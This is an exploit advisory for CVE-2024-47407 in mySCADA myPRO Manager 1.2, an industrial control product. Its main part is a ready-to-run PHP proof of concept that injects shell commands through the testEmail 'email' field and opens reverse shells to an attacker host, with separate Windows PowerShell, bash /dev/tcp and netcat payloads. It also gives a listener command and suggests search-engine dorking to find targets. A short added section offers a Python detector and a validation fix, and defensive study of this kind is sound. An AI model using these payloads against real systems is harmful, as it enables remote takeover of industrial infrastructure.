MySCADA MyPRO Manager 1.2 PHP Code Injection

=============================================================================================================================================
| # Title : MySCADA MyPRO Manager 1.2 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 135.0.1 (64 bits) |
| # Vendor : https://www.myscada.org/mypro/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description:

PHP Code Injection Vulnerability in mySCADA myPRO Manager versions up to v1.2, aka CVE-2024-47407.

Send an HTTP POST request to /get with the email data containing the command to be executed.

Check if the response is 200, meaning the command was executed successfully.

Before running the code, open a Netcat window on your attacking machine and listen for connections on the specified port: nc -lvnp ATTACKER_PORT

(Related: https://packetstorm.news/files/id/189175/ Related CVE numbers: CVE-2024-47407)

[+] Save code as poc.php.

[+] Set Target : line 4 + 5 + 6

[+] Usage : php poc.php

[+] Payload :

<?php
// by indoushka
// Exploits CVE-2024-47407 in mySCADA myPRO Manager to obtain a reverse shell on different operating systems

$target = "http://target-ip:34022/get"; // replace with the target IP
$attacker_ip = "ATTACKER_IP"; // replace with the attacker IP
$attacker_port = "ATTACKER_PORT"; // replace with the port the listener is on

// Reverse shell payloads for each operating system
$windows_payload = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"\$client = New-Object System.Net.Sockets.TCPClient('$attacker_ip',$attacker_port); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()}; \$client.Close()\"";

$linux_payload = "/bin/bash -c 'bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1'";

$mac_payload = "osascript -e 'do shell script \"nc -e /bin/bash $attacker_ip $attacker_port\"'";

// Build the injected email value, choosing the payload by operating system
$email_injection = rand(100, 999) . "@" . rand(1000, 9999) . ".com&&";

$email_injection .= "if exist C:\\Windows\\System32\\ cmd /c \"$windows_payload\"";
$email_injection .= "; if [ -f /bin/bash ]; then $linux_payload; fi";
$email_injection .= "; if [ -f /usr/bin/osascript ]; then $mac_payload; fi";
$email_injection .= " #";

// Build the request body
$data = json_encode([
"command" => "testEmail",
"email" => $email_injection
]);

// Send the request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check the response status
if ($http_code == 200) {
echo "[+] Reverse shell request sent successfully! Check the listener on port $attacker_port\n";
} else {
echo "[-] Exploit failed.\n";
}
?>
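
[+] Detection (added example, not part of the original PoC or the vendor's code): the request above is a JSON POST to /get with "command" set to "testEmail" and shell syntax appended to the "email" value. The Python sketch below inspects captured requests (for example from a reverse proxy in front of port 34022) for that shape. The function name, the strict address pattern and the sample requests are assumptions constructed for illustration.

```python
import json
import re

# Assumption: a legitimate testEmail value is one plain address and nothing else.
STRICT_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
# Characters that chain, substitute or comment out commands in Windows and Unix shells.
SHELL_META = re.compile(r"[&|;`$<>#\"'\\\s(){}]")


def inspect_request(method, path, body):
    """Return a list of findings for one captured HTTP request (empty list = clean)."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/get":
        return []
    try:
        msg = json.loads(body)
    except (ValueError, TypeError):
        return []
    if not isinstance(msg, dict) or msg.get("command") != "testEmail":
        return []
    email = msg.get("email")
    if not isinstance(email, str):
        return ["testEmail: email field is not a string"]
    findings = []
    if not STRICT_EMAIL.fullmatch(email):
        findings.append("testEmail: email is not a single well-formed address")
    meta = sorted(set(SHELL_META.findall(email)))
    if meta:
        findings.append("testEmail: shell metacharacters in email: "
                        + " ".join(map(repr, meta)))
    if len(email) > 254:
        findings.append("testEmail: email longer than 254 characters")
    return findings


# Constructed sample requests (not captured traffic); the injected part is a harmless echo.
SAMPLES = [
    ("POST", "/get", '{"command": "testEmail", "email": "operator@example.com"}'),
    ("POST", "/get", '{"command": "testEmail", "email": "123@4567.com&&echo CONSTRUCTED #"}'),
    ("POST", "/get", '{"command": "someOtherCommand"}'),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(body, "->", inspect_request(method, path, body) or "clean")
```

The same strict-address check, applied server-side before the value reaches any shell, is the input-validation side of the fix; restricting network access to the manager port limits who can send the request at all.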

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================